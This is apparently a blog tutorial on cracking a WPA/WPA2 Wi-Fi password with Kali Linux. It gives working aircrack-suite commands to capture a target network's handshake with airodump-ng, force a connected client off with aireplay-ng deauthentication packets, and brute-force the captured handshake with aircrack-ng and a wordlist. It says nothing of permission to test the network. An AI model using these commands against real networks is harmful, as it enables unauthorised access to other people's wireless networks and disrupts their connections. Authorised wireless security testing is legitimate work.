- A successful install of Kali Linux (which you probably already have done).
- A wireless adapter capable of injection/monitor mode
- A wordlist to try and “crack” the handshake password once it has been captured
- Time and patients
You can see here that my card supports monitor mode and that it’s listed as wlan0.
Now type this command:
airodump-ng –c [channel] –bssid [bssid] –w /root/Desktop/ [monitor interface]Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface, (mon0).
A complete command should look like this:
airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0
Also, four files should show up on your desktop, this is where the handshake will be saved when captured, so don’t delete them!
You can see in this picture, that a client has appeared on our network, allowing us to start the next step.
aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0The –0 is a short cut for the deauth mode and the 2 is the number of deauth packets to send.
-a indicates the access point (router)’s bssid, replace [router bssid] with the BSSID of the target network, which in my case, is 00:14:BF:E0:E8:D5.
-c indicates the clients BSSID, noted in the previous picture. Replace the [client bssid] with the BSSID of the connected client, this will be listed under “STATION.”
And of course, mon0 merely means the monitor interface, change it if yours is different.
aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the password, the * means wild card in Linux, and since I’m assuming that there are no other .cap files on your Desktop, this should work fine the way it is.
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt /root/Desktop/*.cap